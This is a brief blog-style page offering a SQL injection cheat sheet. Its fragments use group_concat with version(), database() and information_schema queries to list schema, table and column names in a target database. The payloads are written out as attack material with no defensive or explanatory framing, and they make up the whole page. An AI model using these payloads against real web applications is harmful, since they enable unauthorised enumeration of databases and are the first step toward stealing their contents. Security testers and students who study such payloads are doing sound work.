Home » » [SQLi] Cheat Sheet

[SQLi] Cheat Sheet

group_concat(version(),0x3a,database())
##############################################

group_concat(schema_name)

 from information_schema.schemata
##############################################
group_concat(table_name)

.tables where table_schema=database()
##############################################
group_concat(column_name)

.columns where table_schema=database()

0 comments:

Post a Comment